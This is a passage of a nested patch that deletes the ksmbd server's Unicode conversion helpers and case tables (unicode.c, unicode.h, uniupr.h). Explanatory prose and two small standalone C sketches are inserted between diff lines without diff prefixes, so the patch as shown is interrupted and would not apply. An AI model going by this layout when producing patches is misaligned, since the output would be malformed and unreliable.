+-		break;
+-	case UNI_GRTRTHAN:
+-		*target = '>';
+-		break;
+-	case UNI_LESSTHAN:
+-		*target = '<';
+-		break;
+-	default:
+-		goto cp_convert;
+-	}
+-
+-out:
+-	return len;
+-
+-cp_convert:
+-	len = cp->uni2char(src_char, target, NLS_MAX_CHARSET_SIZE);
+-	if (len <= 0) {
+-		*target = '?';
+-		len = 1;
+-	}
+-
+-	goto out;
+-}
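
The two conversion paths round-trip six of the NTFS-reserved characters through the Windows private-use area at U+F000 (backslash stays unmapped, as the BB:/FIXME comments in these functions note). A compact sketch of both directions, with the remapping table only and no NLS fallback:

#include <stdio.h>

/* Host char -> private-use code point, mirroring the UNI_* constants. */
static unsigned short to_wire(char c)
{
	switch (c) {
	case ':': case '*': case '?': case '<': case '>': case '|':
		return (unsigned short)(0xF000 + c);
	default:
		return (unsigned short)c;  /* real code uses the NLS tables here */
	}
}

/* Wire code point -> host char, the cifs_mapchar() direction. */
static char from_wire(unsigned short u)
{
	switch (u) {
	case 0xF000 + ':': case 0xF000 + '*': case 0xF000 + '?':
	case 0xF000 + '<': case 0xF000 + '>': case 0xF000 + '|':
		return (char)(u - 0xF000);
	default:
		return u < 0x80 ? (char)u : '?';
	}
}

int main(void)
{
	unsigned short w = to_wire('*');

	printf("'*' -> U+%04X -> '%c'\n", w, from_wire(w));
	return 0;
}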
+-
+-/*
+- * is_char_allowed() - check for valid character
+- * @ch:		input character to be checked
+- *
+- * Return:	1 if char is allowed, otherwise 0
+- */
+-static inline int is_char_allowed(char *ch)
+-{
+-	/* check for control chars, wildcards etc. */
+-	if (!(*ch & 0x80) &&
+-	    (*ch <= 0x1f ||
+-	     *ch == '?' || *ch == '"' || *ch == '<' ||
+-	     *ch == '>' || *ch == '|'))
+-		return 0;
+-
+-	return 1;
+-}
+-
+-/*
+- * smb_from_utf16() - convert utf16le string to local charset
+- * @to:		destination buffer
+- * @from:	source buffer
+- * @tolen:	destination buffer size (in bytes)
+- * @fromlen:	source buffer size (in bytes)
+- * @codepage:	codepage to which characters should be converted
+- * @mapchar:	should characters be remapped according to the mapchars option?
+- *
+- * Convert a little-endian utf16le string (as sent by the server) to a string
+- * in the provided codepage. The tolen and fromlen parameters are to ensure
+- * that the code doesn't walk off of the end of the buffer (which is always
+- * a danger if the alignment of the source buffer is off). The destination
+- * string is always properly null terminated and fits in the destination
+- * buffer. Returns the length of the destination string in bytes (including
+- * null terminator).
+- *
+- * Note that some Windows versions actually send multiword UTF-16 characters
+- * instead of straight UTF16-2. The Linux nls routines, however, aren't able
+- * to deal with those characters properly. In the event that we get some of
+- * those characters, they won't be translated properly.
+- *
+- * Return:	string length after conversion
+- */
+-static int smb_from_utf16(char *to, const __le16 *from, int tolen, int fromlen,
+-			  const struct nls_table *codepage, bool mapchar)
+-{
+-	int i, charlen, safelen;
+-	int outlen = 0;
+-	int nullsize = nls_nullsize(codepage);
+-	int fromwords = fromlen / 2;
+-	char tmp[NLS_MAX_CHARSET_SIZE];
+-	__u16 ftmp;
+-
+-	/*
+-	 * because the chars can be of varying widths, we need to take care
+-	 * not to overflow the destination buffer when we get close to the
+-	 * end of it. Until we get to this offset, we don't need to check
+-	 * for overflow however.
+-	 */
+-	safelen = tolen - (NLS_MAX_CHARSET_SIZE + nullsize);
+-
+-	for (i = 0; i < fromwords; i++) {
+-		ftmp = get_unaligned_le16(&from[i]);
+-		if (ftmp == 0)
+-			break;
+-
+-		/*
+-		 * check to see if converting this character might make the
+-		 * conversion bleed into the null terminator
+-		 */
+-		if (outlen >= safelen) {
+-			charlen = cifs_mapchar(tmp, ftmp, codepage, mapchar);
+-			if ((outlen + charlen) > (tolen - nullsize))
+-				break;
+-		}
+-
+-		/* put converted char into 'to' buffer */
+-		charlen = cifs_mapchar(&to[outlen], ftmp, codepage, mapchar);
+-		outlen += charlen;
+-	}
+-
+-	/* properly null-terminate string */
+-	for (i = 0; i < nullsize; i++)
+-		to[outlen++] = 0;
+-
+-	return outlen;
+-}
+-
+-/*
+- * smb_strtoUTF16() - Convert character string to unicode string
+- * @to:		destination buffer
+- * @from:	source buffer
+- * @len:	destination buffer size (in bytes)
+- * @codepage:	codepage to which characters should be converted
+- *
+- * Return:	string length after conversion
+- */
+-int smb_strtoUTF16(__le16 *to, const char *from, int len,
+-		   const struct nls_table *codepage)
+-{
+-	int charlen;
+-	int i;
+-	wchar_t wchar_to; /* needed to quiet sparse */
+-
+-	/* special case for utf8 to handle no plane0 chars */
+-	if (!strcmp(codepage->charset, "utf8")) {
+-		/*
+-		 * Convert utf8 -> utf16; we assume the caller has ensured
+-		 * that the destination is large enough. len is the
+-		 * destination length in wchar_t units (16 bits).
+-		 */
+-		i  = utf8s_to_utf16s(from, len, UTF16_LITTLE_ENDIAN,
+-				     (wchar_t *)to, len);
+-
+-		/* on success, terminate and exit */
+-		if (i >= 0)
+-			goto success;
+-		/*
+-		 * On failure, fall back to UCS encoding, as this
+-		 * function should not return negative values.
+-		 * It can currently fail only if the source contains
+-		 * invalidly encoded characters.
+-		 */
+-	}
+-
+-	for (i = 0; len > 0 && *from; i++, from += charlen, len -= charlen) {
+-		charlen = codepage->char2uni(from, len, &wchar_to);
+-		if (charlen < 1) {
+-			/* A question mark */
+-			wchar_to = 0x003f;
+-			charlen = 1;
+-		}
+-		put_unaligned_le16(wchar_to, &to[i]);
+-	}
+-
+-success:
+-	put_unaligned_le16(0, &to[i]);
+-	return i;
+-}
+-
+-/*
+- * smb_strndup_from_utf16() - copy a string from wire format to the local
+- *		codepage
+- * @src:	source string
+- * @maxlen:	don't walk past this many bytes in the source string
+- * @is_unicode:	is this a unicode string?
+- * @codepage:	destination codepage
+- *
+- * Take a string given by the server, convert it to the local codepage and
+- * put it in a new buffer. Returns a pointer to the new string or an
+- * ERR_PTR() value on error.
+- *
+- * Return:	destination string buffer or error ptr
+- */
+-char *smb_strndup_from_utf16(const char *src, const int maxlen,
+-			     const bool is_unicode,
+-			     const struct nls_table *codepage)
+-{
+-	int len, ret;
+-	char *dst;
+-
+-	if (is_unicode) {
+-		len = smb_utf16_bytes((__le16 *)src, maxlen, codepage);
+-		len += nls_nullsize(codepage);
+-		dst = kmalloc(len, GFP_KERNEL);
+-		if (!dst)
+-			return ERR_PTR(-ENOMEM);
+-		ret = smb_from_utf16(dst, (__le16 *)src, len, maxlen, codepage,
+-				     false);
+-		if (ret < 0) {
+-			kfree(dst);
+-			return ERR_PTR(-EINVAL);
+-		}
+-	} else {
+-		len = strnlen(src, maxlen);
+-		len++;
+-		dst = kmalloc(len, GFP_KERNEL);
+-		if (!dst)
+-			return ERR_PTR(-ENOMEM);
+-		strscpy(dst, src, len);
+-	}
+-
+-	return dst;
+-}
+-
+-/*
+- * smbConvertToUTF16() - convert string from local charset to utf16
+- * @target:	destination buffer
+- * @source:	source buffer
+- * @srclen:	source buffer size (in bytes)
+- * @cp:		codepage to which characters should be converted
+- * @mapchar:	should characters be remapped according to the mapchars option?
+- *
+- * Convert a 16 bit Unicode pathname to wire format from a string in the
+- * current code page. Conversion may involve remapping the six characters
+- * that are only legal in POSIX-like OSes (if they are present in the
+- * string). Path names are little endian 16 bit Unicode on the wire.
+- *
+- * Return:	char length after conversion
+- */
+-int smbConvertToUTF16(__le16 *target, const char *source, int srclen,
+-		      const struct nls_table *cp, int mapchars)
+-{
+-	int i, j, charlen;
+-	char src_char;
+-	__le16 dst_char;
+-	wchar_t tmp;
+-
+-	if (!mapchars)
+-		return smb_strtoUTF16(target, source, srclen, cp);
+-
+-	for (i = 0, j = 0; i < srclen; j++) {
+-		src_char = source[i];
+-		charlen = 1;
+-		switch (src_char) {
+-		case 0:
+-			put_unaligned(0, &target[j]);
+-			return j;
+-		case ':':
+-			dst_char = cpu_to_le16(UNI_COLON);
+-			break;
+-		case '*':
+-			dst_char = cpu_to_le16(UNI_ASTERISK);
+-			break;
+-		case '?':
+-			dst_char = cpu_to_le16(UNI_QUESTION);
+-			break;
+-		case '<':
+-			dst_char = cpu_to_le16(UNI_LESSTHAN);
+-			break;
+-		case '>':
+-			dst_char = cpu_to_le16(UNI_GRTRTHAN);
+-			break;
+-		case '|':
+-			dst_char = cpu_to_le16(UNI_PIPE);
+-			break;
+-		/*
+-		 * FIXME: We can not handle remapping backslash (UNI_SLASH)
+-		 * until all the calls to build_path_from_dentry are modified,
+-		 * as they use backslash as separator.
+-		 */
+-		default:
+-			charlen = cp->char2uni(source + i, srclen - i, &tmp);
+-			dst_char = cpu_to_le16(tmp);
+-
+-			/*
+-			 * if no match, use question mark, which at least in
+-			 * some cases serves as wild card
+-			 */
+-			if (charlen < 1) {
+-				dst_char = cpu_to_le16(0x003f);
+-				charlen = 1;
+-			}
+-		}
+-		/*
+-		 * character may take more than one byte in the source string,
+-		 * but will take exactly two bytes in the target string
+-		 */
+-		i += charlen;
+-		put_unaligned(dst_char, &target[j]);
+-	}
+-
+-	return j;
+-}
+diff --git a/fs/ksmbd/unicode.h b/fs/ksmbd/unicode.h
+deleted file mode 100644
+index 076f6034a7899..0000000000000
+--- a/fs/ksmbd/unicode.h
++++ /dev/null
+@@ -1,358 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- * Some of the source code in this file came from fs/cifs/cifs_unicode.c
+- * cifs_unicode:  Unicode kernel case support
+- *
+- * Function:
+- *     Convert a unicode character to upper or lower case using
+- *     compressed tables.
+- *
+- *   Copyright (c) International Business Machines  Corp., 2000,2009
+- *
+- *
+- * Notes:
+- *     These APIs are based on the C library functions.  The semantics
+- *     should match the C functions but with expanded size operands.
+- *
+- *     The upper/lower functions are based on a table created by mkupr.
+- *     This is a compressed table of upper and lower case conversion.
+- *
+- */
+-#ifndef _CIFS_UNICODE_H
+-#define _CIFS_UNICODE_H
+-
+-#include <asm/byteorder.h>
+-#include <linux/types.h>
+-#include <linux/nls.h>
+-#include <linux/unicode.h>
+-
+-#define  UNIUPR_NOLOWER		/* Example to not expand lower case tables */
+-
+-/*
+- * Windows maps these to the user defined 16 bit Unicode range since they are
+- * reserved symbols (along with \ and /), otherwise illegal to store
+- * in filenames in NTFS
+- */
+-#define UNI_ASTERISK    ((__u16)('*' + 0xF000))
+-#define UNI_QUESTION    ((__u16)('?' + 0xF000))
+-#define UNI_COLON       ((__u16)(':' + 0xF000))
+-#define UNI_GRTRTHAN    ((__u16)('>' + 0xF000))
+-#define UNI_LESSTHAN    ((__u16)('<' + 0xF000))
+-#define UNI_PIPE        ((__u16)('|' + 0xF000))
+-#define UNI_SLASH       ((__u16)('\\' + 0xF000))
+-
+-/* Just define what we want from uniupr.h.  We don't want to define the tables
+- * in each source file.
+- */
+-#ifndef	UNICASERANGE_DEFINED
+-struct UniCaseRange {
+-	wchar_t start;
+-	wchar_t end;
+-	signed char *table;
+-};
+-#endif				/* UNICASERANGE_DEFINED */
+-
+-#ifndef UNIUPR_NOUPPER
+-extern signed char SmbUniUpperTable[512];
+-extern const struct UniCaseRange SmbUniUpperRange[];
+-#endif				/* UNIUPR_NOUPPER */
+-
+-#ifndef UNIUPR_NOLOWER
+-extern signed char CifsUniLowerTable[512];
+-extern const struct UniCaseRange CifsUniLowerRange[];
+-#endif				/* UNIUPR_NOLOWER */
+-
+-#ifdef __KERNEL__
+-int smb_strtoUTF16(__le16 *to, const char *from, int len,
+-		   const struct nls_table *codepage);
+-char *smb_strndup_from_utf16(const char *src, const int maxlen,
+-			     const bool is_unicode,
+-			     const struct nls_table *codepage);
+-int smbConvertToUTF16(__le16 *target, const char *source, int srclen,
+-		      const struct nls_table *cp, int mapchars);
+-char *ksmbd_extract_sharename(struct unicode_map *um, const char *treename);
+-#endif
+-
+-/*
+- * UniStrcat:  Concatenate the second string to the first
+- *
+- * Returns:
+- *     Address of the first string
+- */
+-static inline wchar_t *UniStrcat(wchar_t *ucs1, const wchar_t *ucs2)
+-{
+-	wchar_t *anchor = ucs1;	/* save a pointer to start of ucs1 */
+-
+-	while (*ucs1++)
+-	/*NULL*/;	/* To end of first string */
+-	ucs1--;			/* Return to the null */
+-	while ((*ucs1++ = *ucs2++))
+-	/*NULL*/;	/* copy string 2 over */
+-	return anchor;
+-}
+-
+-/*
+- * UniStrchr:  Find a character in a string
+- *
+- * Returns:
+- *     Address of first occurrence of character in string
+- *     or NULL if the character is not in the string
+- */
+-static inline wchar_t *UniStrchr(const wchar_t *ucs, wchar_t uc)
+-{
+-	while ((*ucs != uc) && *ucs)
+-		ucs++;
+-
+-	if (*ucs == uc)
+-		return (wchar_t *)ucs;
+-	return NULL;
+-}
+-
+-/*
+- * UniStrcmp:  Compare two strings
+- *
+- * Returns:
+- *     < 0:  First string is less than second
+- *     = 0:  Strings are equal
+- *     > 0:  First string is greater than second
+- */
+-static inline int UniStrcmp(const wchar_t *ucs1, const wchar_t *ucs2)
+-{
+-	while ((*ucs1 == *ucs2) && *ucs1) {
+-		ucs1++;
+-		ucs2++;
+-	}
+-	return (int)*ucs1 - (int)*ucs2;
+-}
+-
+-/*
+- * UniStrcpy:  Copy a string
+- */
+-static inline wchar_t *UniStrcpy(wchar_t *ucs1, const wchar_t *ucs2)
+-{
+-	wchar_t *anchor = ucs1;	/* save the start of result string */
+-
+-	while ((*ucs1++ = *ucs2++))
+-	/*NULL*/;
+-	return anchor;
+-}
+-
+-/*
+- * UniStrlen:  Return the length of a string (in 16 bit Unicode chars not bytes)
+- */
+-static inline size_t UniStrlen(const wchar_t *ucs1)
+-{
+-	int i = 0;
+-
+-	while (*ucs1++)
+-		i++;
+-	return i;
+-}
+-
+-/*
+- * UniStrnlen:  Return the length (in 16 bit Unicode chars not bytes) of a
+- *		string (length limited)
+- */
+-static inline size_t UniStrnlen(const wchar_t *ucs1, int maxlen)
+-{
+-	int i = 0;
+-
+-	while (*ucs1++) {
+-		i++;
+-		if (i >= maxlen)
+-			break;
+-	}
+-	return i;
+-}
+-
+-/*
+- * UniStrncat:  Concatenate length limited string
+- */
+-static inline wchar_t *UniStrncat(wchar_t *ucs1, const wchar_t *ucs2, size_t n)
+-{
+-	wchar_t *anchor = ucs1;	/* save pointer to string 1 */
+-
+-	while (*ucs1++)
+-	/*NULL*/;
+-	ucs1--;			/* point to null terminator of s1 */
+-	while (n-- && (*ucs1 = *ucs2)) {	/* copy s2 after s1 */
+-		ucs1++;
+-		ucs2++;
+-	}
+-	*ucs1 = 0;		/* Null terminate the result */
+-	return anchor;
+-}
+-
+-/*
+- * UniStrncmp:  Compare length limited string
+- */
+-static inline int UniStrncmp(const wchar_t *ucs1, const wchar_t *ucs2, size_t n)
+-{
+-	if (!n)
+-		return 0;	/* Null strings are equal */
+-	while ((*ucs1 == *ucs2) && *ucs1 && --n) {
+-		ucs1++;
+-		ucs2++;
+-	}
+-	return (int)*ucs1 - (int)*ucs2;
+-}
+-
+-/*
+- * UniStrncmp_le:  Compare length limited string - native to little-endian
+- */
+-static inline int
+-UniStrncmp_le(const wchar_t *ucs1, const wchar_t *ucs2, size_t n)
+-{
+-	if (!n)
+-		return 0;	/* Null strings are equal */
+-	while ((*ucs1 == __le16_to_cpu(*ucs2)) && *ucs1 && --n) {
+-		ucs1++;
+-		ucs2++;
+-	}
+-	return (int)*ucs1 - (int)__le16_to_cpu(*ucs2);
+-}
+-
+-/*
+- * UniStrncpy:  Copy length limited string with pad
+- */
+-static inline wchar_t *UniStrncpy(wchar_t *ucs1, const wchar_t *ucs2, size_t n)
+-{
+-	wchar_t *anchor = ucs1;
+-
+-	while (n-- && *ucs2)	/* Copy the strings */
+-		*ucs1++ = *ucs2++;
+-
+-	n++;
+-	while (n--)		/* Pad with nulls */
+-		*ucs1++ = 0;
+-	return anchor;
+-}
+-
+-/*
+- * UniStrncpy_le:  Copy length limited string with pad to little-endian
+- */
+-static inline wchar_t *UniStrncpy_le(wchar_t *ucs1, const wchar_t *ucs2, size_t n)
+-{
+-	wchar_t *anchor = ucs1;
+-
+-	while (n-- && *ucs2)	/* Copy the strings */
+-		*ucs1++ = __le16_to_cpu(*ucs2++);
+-
+-	n++;
+-	while (n--)		/* Pad with nulls */
+-		*ucs1++ = 0;
+-	return anchor;
+-}
+-
+-/*
+- * UniStrstr:  Find a string in a string
+- *
+- * Returns:
+- *     Address of first match found
+- *     NULL if no matching string is found
+- */
+-static inline wchar_t *UniStrstr(const wchar_t *ucs1, const wchar_t *ucs2)
+-{
+-	const wchar_t *anchor1 = ucs1;
+-	const wchar_t *anchor2 = ucs2;
+-
+-	while (*ucs1) {
+-		if (*ucs1 == *ucs2) {
+-			/* Partial match found */
+-			ucs1++;
+-			ucs2++;
+-		} else {
+-			if (!*ucs2)	/* Match found */
+-				return (wchar_t *)anchor1;
+-			ucs1 = ++anchor1;	/* No match */
+-			ucs2 = anchor2;
+-		}
+-	}
+-
+-	if (!*ucs2)		/* Both end together */
+-		return (wchar_t *)anchor1;	/* Match found */
+-	return NULL;		/* No match */
+-}
+-
+-#ifndef UNIUPR_NOUPPER
+-/*
+- * UniToupper:  Convert a unicode character to upper case
+- */
+-static inline wchar_t UniToupper(register wchar_t uc)
+-{
+-	register const struct UniCaseRange *rp;
+-
+-	if (uc < sizeof(SmbUniUpperTable)) {
+-		/* Latin characters */
+-		return uc + SmbUniUpperTable[uc];	/* Use base tables */
+-	}
+-
+-	rp = SmbUniUpperRange;	/* Use range tables */
+-	while (rp->start) {
+-		if (uc < rp->start)	/* Before start of range */
+-			return uc;	/* Uppercase = input */
+-		if (uc <= rp->end)	/* In range */
+-			return uc + rp->table[uc - rp->start];
+-		rp++;	/* Try next range */
+-	}
+-	return uc;		/* Past last range */
+-}
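
The table scheme above uses dense signed deltas for Latin code points and sparse {start, end, table} ranges beyond them. It can be exercised with a toy single-range version covering only three Greek code points (the real tables live in uniupr.h; -32 is the usual lower-to-upper delta there):

#include <stdio.h>

struct case_range {
	unsigned short start, end;
	const signed char *table;	/* one delta per code point in [start, end] */
};

/* Toy range: U+03B1..U+03B3 (alpha..gamma) upper-case by subtracting 32. */
static const signed char greek[] = { -32, -32, -32 };
static const struct case_range ranges[] = {
	{ 0x03B1, 0x03B3, greek },
	{ 0, 0, NULL },			/* sentinel, as in SmbUniUpperRange */
};

static unsigned short toy_toupper(unsigned short uc)
{
	const struct case_range *rp;

	for (rp = ranges; rp->start; rp++) {
		if (uc < rp->start)
			return uc;	/* before any remaining range */
		if (uc <= rp->end)
			return uc + rp->table[uc - rp->start];
	}
	return uc;			/* past the last range */
}

int main(void)
{
	printf("U+%04X -> U+%04X\n", 0x03B1u, (unsigned)toy_toupper(0x03B1));
	return 0;
}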
+-
+-/*
+- * UniStrupr:  Upper case a unicode string
+- */
+-static inline __le16 *UniStrupr(register __le16 *upin)
+-{
+-	register __le16 *up;
+-
+-	up = upin;
+-	while (*up) {		/* For all characters */
+-		*up = cpu_to_le16(UniToupper(le16_to_cpu(*up)));
+-		up++;
+-	}
+-	return upin;		/* Return input pointer */
+-}
+-#endif				/* UNIUPR_NOUPPER */
+-
+-#ifndef UNIUPR_NOLOWER
+-/*
+- * UniTolower:  Convert a unicode character to lower case
+- */
+-static inline wchar_t UniTolower(register wchar_t uc)
+-{
+-	register const struct UniCaseRange *rp;
+-
+-	if (uc < sizeof(CifsUniLowerTable)) {
+-		/* Latin characters */
+-		return uc + CifsUniLowerTable[uc];	/* Use base tables */
+-	}
+-
+-	rp = CifsUniLowerRange;	/* Use range tables */
+-	while (rp->start) {
+-		if (uc < rp->start)	/* Before start of range */
+-			return uc;	/* Lowercase = input */
+-		if (uc <= rp->end)	/* In range */
+-			return uc + rp->table[uc - rp->start];
+-		rp++;	/* Try next range */
+-	}
+-	return uc;		/* Past last range */
+-}
+-
+-/*
+- * UniStrlwr:  Lower case a unicode string
+- */
+-static inline wchar_t *UniStrlwr(register wchar_t *upin)
+-{
+-	register wchar_t *up;
+-
+-	up = upin;
+-	while (*up) {		/* For all characters */
+-		*up = UniTolower(*up);
+-		up++;
+-	}
+-	return upin;		/* Return input pointer */
+-}
+-
+-#endif
+-
+-#endif /* _CIFS_UNICODE_H */
+diff --git a/fs/ksmbd/uniupr.h b/fs/ksmbd/uniupr.h
+deleted file mode 100644
+index 26583b776897b..0000000000000
+--- a/fs/ksmbd/uniupr.h
++++ /dev/null
+@@ -1,268 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Some of the source code in this file came from fs/cifs/uniupr.h
+- *   Copyright (c) International Business Machines  Corp., 2000,2002
+- *
+- * uniupr.h - Unicode compressed case ranges
+- *
+- */
+-#ifndef __KSMBD_UNIUPR_H
+-#define __KSMBD_UNIUPR_H
+-
+-#ifndef UNIUPR_NOUPPER
+-/*
+- * Latin upper case
+- */
+-signed char SmbUniUpperTable[512] = {
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 000-00f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 010-01f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 020-02f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 030-03f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 040-04f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 050-05f */
+-	0, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,
+-				-32, -32, -32, -32, -32,	/* 060-06f */
+-	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32,
+-				-32, 0, 0, 0, 0, 0,	/* 070-07f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 080-08f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 090-09f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0a0-0af */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0b0-0bf */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0c0-0cf */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0d0-0df */
+-	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32,
+-			 -32, -32, -32, -32, -32, -32,	/* 0e0-0ef */
+-	-32, -32, -32, -32, -32, -32, -32, 0, -32, -32,
+-			 -32, -32, -32, -32, -32, 121,	/* 0f0-0ff */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 100-10f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 110-11f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 120-12f */
+-	0, 0, 0, -1, 0, -1, 0, -1, 0, 0, -1, 0, -1, 0, -1, 0,	/* 130-13f */
+-	-1, 0, -1, 0, -1, 0, -1, 0, -1, 0, 0, -1, 0, -1, 0, -1,	/* 140-14f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 150-15f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 160-16f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, 0, -1, 0, -1, 0, -1, 0,	/* 170-17f */
+-	0, 0, 0, -1, 0, -1, 0, 0, -1, 0, 0, 0, -1, 0, 0, 0,	/* 180-18f */
+-	0, 0, -1, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0, 0, 0, 0,	/* 190-19f */
+-	0, -1, 0, -1, 0, -1, 0, 0, -1, 0, 0, 0, 0, -1, 0, 0,	/* 1a0-1af */
+-	-1, 0, 0, 0, -1, 0, -1, 0, 0, -1, 0, 0, 0, -1, 0, 0,	/* 1b0-1bf */
+-	0, 0, 0, 0, 0, -1, -2, 0, -1, -2, 0, -1, -2, 0, -1, 0,	/* 1c0-1cf */
+-	-1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, -79, 0, -1, /* 1d0-1df */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e0-1ef */
+-	0, 0, -1, -2, 0, -1, 0, 0, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1f0-1ff */
+-};
+-
+-/* Upper case range - Greek */
+-static signed char UniCaseRangeU03a0[47] = {
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -38, -37, -37, -37,	/* 3a0-3af */
+-	0, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,
+-					 -32, -32, -32, -32,	/* 3b0-3bf */
+-	-32, -32, -31, -32, -32, -32, -32, -32, -32, -32, -32, -32, -64,
+-	-63, -63,
+-};
+-
+-/* Upper case range - Cyrillic */
+-static signed char UniCaseRangeU0430[48] = {
+-	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,
+-					 -32, -32, -32, -32,	/* 430-43f */
+-	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,
+-					 -32, -32, -32, -32,	/* 440-44f */
+-	0, -80, -80, -80, -80, -80, -80, -80, -80, -80, -80,
+-					 -80, -80, 0, -80, -80,	/* 450-45f */
+-};
+-
+-/* Upper case range - Extended cyrillic */
+-static signed char UniCaseRangeU0490[61] = {
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 490-49f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 4a0-4af */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 4b0-4bf */
+-	0, 0, -1, 0, -1, 0, 0, 0, -1, 0, 0, 0, -1,
+-};
+-
+-/* Upper case range - Extended latin and greek */
+-static signed char UniCaseRangeU1e00[509] = {
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e00-1e0f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e10-1e1f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e20-1e2f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e30-1e3f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e40-1e4f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e50-1e5f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e60-1e6f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e70-1e7f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e80-1e8f */
+-	0, -1, 0, -1, 0, -1, 0, 0, 0, 0, 0, -59, 0, -1, 0, -1,	/* 1e90-1e9f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1ea0-1eaf */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1eb0-1ebf */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1ec0-1ecf */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1ed0-1edf */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1ee0-1eef */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, 0, 0, 0, 0, 0,	/* 1ef0-1eff */
+-	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f00-1f0f */
+-	8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f10-1f1f */
+-	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f20-1f2f */
+-	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f30-1f3f */
+-	8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f40-1f4f */
+-	0, 8, 0, 8, 0, 8, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f50-1f5f */
+-	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f60-1f6f */
+-	74, 74, 86, 86, 86, 86, 100, 100, 0, 0, 112, 112,
+-				 126, 126, 0, 0,	/* 1f70-1f7f */
+-	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f80-1f8f */
+-	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f90-1f9f */
+-	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fa0-1faf */
